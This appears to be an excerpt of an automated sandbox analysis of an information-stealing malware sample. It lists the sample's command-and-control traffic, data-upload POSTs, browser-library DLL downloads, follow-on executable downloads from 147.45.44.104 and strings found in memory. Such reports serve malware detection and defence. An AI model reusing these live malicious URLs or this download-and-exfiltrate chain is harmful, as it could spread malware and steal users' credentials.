Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DBFBFBGDBKJJKFIEHJDBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 499Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: drawzhotdog.shop
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EHIDAKECFIEBGDHJEBKKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: fragnantbui.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: stogeneratmns.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: reinforcenh.shop
Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: ballotnwu.site
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DAAFIIJDAAAAKFHIDAAAUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 256Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DGHJECAFIDAFHJKFCGHIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GDAECAECFCAAEBFHIEHDUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FCGCGDHJEGHJKFHJJJKJUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 332Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KFBGDBFBKKJECBFHDGIEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 7153Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sqlp.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JJJKFBAAAFHJEBFIEGIDUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 4677Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /prog/66f5dbaca34ac_lfdnsafnds.exe HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /prog/66f5db9e54794_vfkagks.exe HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /prog/66f5d9ab0d4c7_rdp.exe HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HJKECAAAFHJECAAAEBFCUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: cowod.hopto.orgContent-Length: 5785Connection: Keep-AliveCache-Control: no-cache

Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 2_2_00406963 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

2_2_00406963

Source: global traffic	HTTP traffic detected: GET /profiles/76561199780418869 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sqlp.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic	HTTP traffic detected: GET /profiles/76561199780418869 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sqlp.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /prog/66f5dbaca34ac_lfdnsafnds.exe HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /prog/66f5db9e54794_vfkagks.exe HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /prog/66f5d9ab0d4c7_rdp.exe HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /prog/66f55533ca7d6_RDPWInst.exe HTTP/1.1Host: 147.45.44.104Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org

Source: RegAsm.exe, 00000008.00000002.2501224995.0000000000CCE000.00000004.00000020.00020000.00000000.sdmp

String found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ h equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic	DNS traffic detected: DNS query: wallkedsleeoi.shop
Source: global traffic	DNS traffic detected: DNS query: gutterydhowi.shop
Source: global traffic	DNS traffic detected: DNS query: ghostreedmnu.shop
Source: global traffic	DNS traffic detected: DNS query: offensivedzvju.shop
Source: global traffic	DNS traffic detected: DNS query: vozmeatillu.shop
Source: global traffic	DNS traffic detected: DNS query: drawzhotdog.shop
Source: global traffic	DNS traffic detected: DNS query: fragnantbui.shop
Source: global traffic	DNS traffic detected: DNS query: stogeneratmns.shop
Source: global traffic	DNS traffic detected: DNS query: cowod.hopto.org
Source: global traffic	DNS traffic detected: DNS query: reinforcenh.shop
Source: global traffic	DNS traffic detected: DNS query: ballotnwu.site
Source: global traffic	DNS traffic detected: DNS query: api.ipify.org
Source: global traffic	DNS traffic detected: DNS query: hansgborn.eu

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KKFCFBKFCFBFIDGCGDHJUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 256Connection: Keep-AliveCache-Control: no-cache

Source: RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: Http://cowod.hopto.orgJDB
Source: AFHDGDGIID.exe, 0000000C.00000002.2653462111.0000000002F51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104
Source: AFHDGDGIID.exe, 0000000C.00000002.2653462111.0000000002F51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/prog/66f55533ca7d6_RDPWInst.exe
Source: RegAsm.exe, 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2452955008.00000000007CB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2452955008.00000000007DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/prog/66f5d9ab0d4c7_rdp.exe
Source: RegAsm.exe, 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2452955008.00000000007DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/prog/66f5db9e54794_vfkagks.exe
Source: RegAsm.exe, 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/prog/66f5db9e54794_vfkagks.exem-data;
Source: RegAsm.exe, 00000002.00000002.2452955008.000000000097A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/prog/66f5db9e54794_vfkagks.exex
Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2452955008.00000000007DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/prog/66f5dbaca34ac_lfdnsafnds.exe
Source: RegAsm.exe, 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/prog/66f5dbaca34ac_lfdnsafnds.exe1kkkk1220577http://147.45.44.104/prog/66f5db9e
Source: RegAsm.exe, 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/prog/66f5dbaca34ac_lfdnsafnds.exeata;
Source: file.exe, 66f5db9e54794_vfkagks[1].exe.2.dr, GIIIIJDHJE.exe.2.dr, IDBAFHDGDG.exe.2.dr, 66f5dbaca34ac_lfdnsafnds[1].exe.2.dr	String found in binary or memory: http://aia.entrust.net/ts1-chain256.cer01
Source: AFHDGDGIID.exe, 0000000C.00000002.2653462111.00000000033A6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.ipify.org
Source: AFHDGDGIID.exe, 0000000C.00000002.2653462111.00000000033C5000.00000004.00000800.00020000.00000000.sdmp, AFHDGDGIID.exe, 0000000C.00000002.2653462111.00000000033A6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.ipify.org/
Source: AFHDGDGIID.exe, 0000000C.00000002.2653462111.00000000033B1000.00000004.00000800.00020000.00000000.sdmp, AFHDGDGIID.exe, 0000000C.00000002.2653462111.00000000033C5000.00000004.00000800.00020000.00000000.sdmp, AFHDGDGIID.exe, 0000000C.00000002.2653462111.00000000033A6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.ipify.orgd
Source: RegAsm.exe, 00000002.00000002.2490924710.0000000025D02000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2510766447.0000000031BEE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2530480824.000000003DACD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2486690771.000000001FD91000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: RegAsm.exe, 00000002.00000002.2490924710.0000000025D02000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2510766447.0000000031BEE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2530480824.000000003DACD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2486690771.000000001FD91000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: RegAsm.exe, 00000002.00000002.2490924710.0000000025D02000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2510766447.0000000031BEE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2530480824.000000003DACD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2486690771.000000001FD91000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: file.exe, 66f5db9e54794_vfkagks[1].exe.2.dr, GIIIIJDHJE.exe.2.dr, IDBAFHDGDG.exe.2.dr, 66f5dbaca34ac_lfdnsafnds[1].exe.2.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: RegAsm.exe, 00000002.00000002.2490924710.0000000025D02000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2510766447.0000000031BEE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2530480824.000000003DACD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2486690771.000000001FD91000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: RegAsm.exe, 00000002.00000002.2490924710.0000000025D02000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2510766447.0000000031BEE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2530480824.000000003DACD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2486690771.000000001FD91000.00000004.00000020.00020000.00000000.sdmp, file.exe, freebl3.dll.2.dr, 66f5db9e54794_vfkagks[1].exe.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, GIIIIJDHJE.exe.2.dr, nss3.dll.2.dr, IDBAFHDGDG.exe.2.dr, 66f5dbaca34ac_lfdnsafnds[1].exe.2.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.BKJJKFIEHJDB
Source: RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto
Source: RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.
Source: RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.IEHJDB
Source: RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.org
Source: RegAsm.exe, 00000002.00000002.2452955008.0000000000898000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.org/
Source: RegAsm.exe, 00000002.00000002.2452955008.0000000000898000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.org/s
Source: RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.orgJDB
Source: file.exe, 00000000.00000002.1732259404.0000000003D45000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.org_DEBUG.zip/c
Source: RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hoptoFIEHJDB
Source: file.exe, 66f5db9e54794_vfkagks[1].exe.2.dr, GIIIIJDHJE.exe.2.dr, IDBAFHDGDG.exe.2.dr, 66f5dbaca34ac_lfdnsafnds[1].exe.2.dr	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: file.exe, 66f5db9e54794_vfkagks[1].exe.2.dr, GIIIIJDHJE.exe.2.dr, IDBAFHDGDG.exe.2.dr, 66f5dbaca34ac_lfdnsafnds[1].exe.2.dr	String found in binary or memory: http://crl.entrust.net/ts1ca.crl0
Source: RegAsm.exe, 00000002.00000002.2490924710.0000000025D02000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2510766447.0000000031BEE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2530480824.000000003DACD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2486690771.000000001FD91000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: RegAsm.exe, 00000002.00000002.2490924710.0000000025D02000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2510766447.0000000031BEE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2530480824.000000003DACD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2486690771.000000001FD91000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: RegAsm.exe, 00000002.00000002.2490924710.0000000025D02000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2510766447.0000000031BEE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2530480824.000000003DACD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2486690771.000000001FD91000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: file.exe, 66f5db9e54794_vfkagks[1].exe.2.dr, GIIIIJDHJE.exe.2.dr, IDBAFHDGDG.exe.2.dr, 66f5dbaca34ac_lfdnsafnds[1].exe.2.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: RegAsm.exe, 00000002.00000002.2490924710.0000000025D02000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2510766447.0000000031BEE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2530480824.000000003DACD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2486690771.000000001FD91000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: RegAsm.exe, 00000002.00000002.2490924710.0000000025D02000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2510766447.0000000031BEE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2530480824.000000003DACD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2486690771.000000001FD91000.00000004.00000020.00020000.00000000.sdmp, file.exe, freebl3.dll.2.dr, 66f5db9e54794_vfkagks[1].exe.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, GIIIIJDHJE.exe.2.dr, nss3.dll.2.dr, IDBAFHDGDG.exe.2.dr, 66f5dbaca34ac_lfdnsafnds[1].exe.2.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: RegAsm.exe, 00000002.00000002.2490924710.0000000025D02000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2510766447.0000000031BEE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2530480824.000000003DACD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2486690771.000000001FD91000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
